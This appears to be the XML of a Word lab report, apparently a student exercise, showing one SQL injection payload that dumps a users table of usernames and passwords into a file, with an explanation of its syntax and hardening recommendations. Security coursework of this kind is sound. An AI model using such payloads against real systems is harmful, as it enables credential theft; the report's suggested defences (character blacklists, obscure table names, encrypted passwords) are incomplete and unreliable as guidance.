      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0054009B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘; SELECT * FROM users INTO outfile “</w:t>
      </w:r>
      <w:r w:rsidR="00B573F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/root</w:t>
      </w:r>
      <w:r w:rsidRPr="0054009B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F0806" w14:textId="624CE3F4" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD1E839" w14:textId="3AFEBA8C" w:rsidR="00B573F9" w:rsidRDefault="00B573F9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This exploit allows me to dump the contents of the user table, (usernames passwords and locked status) into a text file that I can then access and read. However, I had some issues getting this one to work, so I am unable to showcase a screenshot of this exploit working, sorry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6927A405" w14:textId="30CC487B" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28056968" w14:textId="72A982A2" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C058878" w14:textId="2B515B1B" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B20E9DB" w14:textId="68B86899" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0591A11C" w14:textId="3EDE5563" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727E82DD" w14:textId="7A6F588F" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA564F5" w14:textId="101EB9FD" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D1CE1E" w14:textId="5CDD1902" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29153FD7" w14:textId="2F3ED3FA" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1856F27E" w14:textId="5AA188FD" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02113B1D" w14:textId="6A157BE8" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553F7236" w14:textId="7E0D66EB" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63323563" w14:textId="18370616" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F13BC8" w14:textId="6E8F2D90" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D3D937" w14:textId="2B40B5AD" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C866524" w14:textId="7AE3183A" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7525568A" w14:textId="3475D482" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27665A1E" w14:textId="1C9BF10A" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257AD2B1" w14:textId="73F1A3C5" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1824A3BF" w14:textId="50AA8E82" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A3598E" w14:textId="77777777" w:rsidR="00B573F9" w:rsidRDefault="00B573F9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2F2669" w14:textId="594762BA" w:rsidR="00735F26" w:rsidRDefault="00735F2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Security Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1B923" w14:textId="190B6070" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647F6647" w14:textId="247CA424" w:rsidR="008E513A" w:rsidRDefault="008E513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All of these exploits use a similar base syntax, they start with a ‘; which</w:t>
      </w:r>
      <w:r w:rsidR="00B2643B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ends the previous sql command string as a command, with the semicolon. Then at the end of the injection there is a ;# the semicolon ends the command I have entered and the hash comments out the rest of the code in the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6659AB3E" w14:textId="77777777" w:rsidR="008E513A" w:rsidRDefault="008E513A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAF97E5" w14:textId="0848B846" w:rsidR="00735F26" w:rsidRPr="00735F26" w:rsidRDefault="00412419">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk98793020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The main recommendation I would give to harden this application is to filter inputs. Instead of passing strings with possible sql injections in them directly to the sql server, first parse the strings and </w:t>
      </w:r>
      <w:r w:rsidR="00230C9C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">either replace any common sql characters and commands (ex. ‘ character) with a replacement character, or simply not allow certain characters like that to be entered in the first place. Also, I would recommend a character limit in the input fields. </w:t>
      </w:r>
      <w:r w:rsidR="00B573F9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I would also recommend that the database and tables use less common names than “users” and “password” so it is more difficult for an attacker to guess.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00B573F9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Finally, it would be a good idea that any sensitive information such as passwords stored in this database be encrypted so even if an attacker gains access then the information is useless to them.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00735F26" w:rsidRPr="00735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AE"/>
    <w:rsid w:val="00103E98"/>
    <w:rsid w:val="00193663"/>
    <w:rsid w:val="00230C9C"/>
    <w:rsid w:val="00412419"/>
    <w:rsid w:val="0054009B"/>
    <w:rsid w:val="00735F26"/>
    <w:rsid w:val="00782069"/>
    <w:rsid w:val="008E513A"/>
    <w:rsid w:val="009826F6"/>
    <w:rsid w:val="00B2643B"/>
    <w:rsid w:val="00B573F9"/>
    <w:rsid w:val="00B61E24"/>
    <w:rsid w:val="00B6445D"/>
    <w:rsid w:val="00BF1F7F"/>
    <w:rsid w:val="00C20AAE"/>
    <w:rsid w:val="00C2172F"/>
    <w:rsid w:val="00C6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1BB3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BBDD79B7-C5BF-4AF6-B7D4-10F3A507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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-17T02:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-22T04:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>